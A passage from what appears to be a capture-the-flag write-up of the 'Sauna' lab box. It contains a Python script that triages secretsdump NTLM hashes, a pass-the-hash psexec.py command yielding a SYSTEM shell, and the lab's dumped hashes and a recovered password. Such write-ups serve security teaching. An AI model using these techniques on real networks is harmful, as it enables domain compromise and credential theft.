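Parses the domain\\uid:rid:lmhash:nthash::: lines, groups accounts by NT
hash (same hash = same password) and flags empty passwords, stored LM
hashes and machine accounts. Sample input is the dump shown above.
"""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM of "": LM storage disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")

# Copied from the secretsdump output above; the Kerberos-key lines that follow
# the NTLM block are included to show they are skipped.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:97d33cc179ece045b9dd8f8ecd61a944:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
"""


def parse_secretsdump(text):
    """Return one dict per NTLM line; Kerberos-key and [*] status lines are skipped."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            acct = m.groupdict()
            acct["rid"] = int(acct["rid"])
            accounts.append(acct)
    return accounts


def shared_nt_hashes(accounts):
    """Map NT hash -> users, only for hashes used by more than one account."""
    by_hash = defaultdict(list)
    for acct in accounts:
        by_hash[acct["nt"]].append(acct["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def triage(accounts):
    """Per-account findings a pentester reports (or a blue team hunts for)."""
    findings = {}
    for acct in accounts:
        notes = []
        if acct["nt"] == EMPTY_NT:
            notes.append("empty password")
        if acct["lm"] != EMPTY_LM:
            notes.append("LM hash stored (trivially crackable)")
        if acct["user"].endswith("$"):
            notes.append("machine account")
        if acct["rid"] == 502:
            notes.append("krbtgt: hash enables golden tickets, reset it twice after compromise")
        if acct["rid"] == 500:
            notes.append("built-in Administrator: pass-the-hash target")
        if notes:
            findings[acct["user"]] = notes
    return findings


def pth_credentials(accounts):
    """user -> LM:NT string in the form psexec.py -hashes and evil-winrm -H expect."""
    return {a["user"]: f'{a["lm"]}:{a["nt"]}' for a in accounts}


if __name__ == "__main__":
    accts = parse_secretsdump(SAMPLE_DUMP)
    for h, users in shared_nt_hashes(accts).items():
        print(f"[!] password reuse: {', '.join(users)} share NT hash {h}")
    for user, notes in triage(accts).items():
        print(f"[*] {user}: {'; '.join(notes)}")
```

On this dump it reports that HSmith and FSmith share the NT hash 58a52d36c84fb7f5f1beab9a201db1dd, so HSmith's password is also Thestrokes23, and that Guest's NT hash is the empty-password value. The pth_credentials() strings are exactly what the psexec.py -hashes argument below takes.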


Now that I have the Administrator NT hash there is no need to crack it: psexec.py takes -hashes LM:NT and authenticates over SMB with the hash directly (pass-the-hash). The LM half, aad3b435b51404eeaad3b435b51404ee, is the constant empty-LM value you will see on every modern domain. Two things worth knowing about psexec.py: it works by writing a randomly named executable to the ADMIN$ share and registering it as a service, so the shell runs as NT AUTHORITY\SYSTEM rather than as Administrator, and it is noisy (wmiexec.py or evil-winrm -H are quieter). Also notice in the dump that HSmith has the same NT hash as FSmith, so both accounts use the password Thestrokes23.


root in impacket/examples on master via 🐍 v2.7.17
❯ python psexec.py EGOTISTICALBANK/Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff -target-ip 10.10.10.175
Impacket v0.9.21.dev1+20200305.180336.e0c1b9dd - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file GWcAFdKS.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service iwyN on 10.10.10.175.....
[*] Starting service iwyN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami & hostname
nt authority\system
SAUNA

C:\Windows\system32>

Grab the root.txt

With a SYSTEM shell I can now read root.txt:


C:\Windows\system32>cd \Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 489C-D8FC

Directory of C:\Users\Administrator\Desktop

01/23/2020 04:11 PM <DIR> .
01/23/2020 04:11 PM <DIR> ..
01/23/2020 11:22 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 7,681,822,720 bytes free

C:\Users\Administrator\Desktop>more root.txt
04965c68

C:\Users\Administrator\Desktop>



If you liked my writeup please leave a respect on my Profile

Payas0


References:

ASREProast

GetNPUsers

BloodHound

WinPEAS

secretsdump